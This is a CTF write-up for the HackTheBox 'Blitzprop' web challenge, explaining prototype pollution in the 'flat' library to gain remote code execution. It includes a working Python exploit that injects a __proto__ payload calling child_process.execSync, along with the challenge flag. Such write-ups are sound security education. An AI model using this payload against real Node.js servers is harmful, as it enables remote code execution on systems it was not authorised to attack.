Skip to content

Latest commit

 

History

History
52 lines (41 loc) · 1.38 KB

blitzprop.md

File metadata and controls

52 lines (41 loc) · 1.38 KB
name event category description layout
Blitzprop (2021)
HackTheBox Cyber Apocalypse CTF 2021
Web
Writeup for Blitzprop (Web) - HackTheBox Cyber Apocalypse CTF (2021) 💜
title description tableOfContents outline pagination
visible
true
visible
true
visible
true
visible
true
visible
true

Blitzprop

Video Walkthrough

VIDEO

Challenge Description

To exploit this, you need to use a ‘prototype pollution’ vulnerability within the flat library in order to gain RCE against the target. This requires a request to the server to 'pollute' the JavaScript objects, then a second request to trigger the payload. Overall, it was a really interesting box!

Solution

{% code overflow="wrap" %}

from pwn import *
import requests

TARGET_URL = 'http://188.166.172.13:31177'

# https://blog.p6.is/AST-Injection/
result = requests.post(TARGET_URL + '/api/submit', json={
    "song.name": "The Goose went wild",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync(`cp flagz8gWv static/flag`)"
    }
})

flag = requests.get(TARGET_URL + '/static/flag').text
success(flag)

{% endcode %}

Flag: CHTB{p0llute_with_styl3}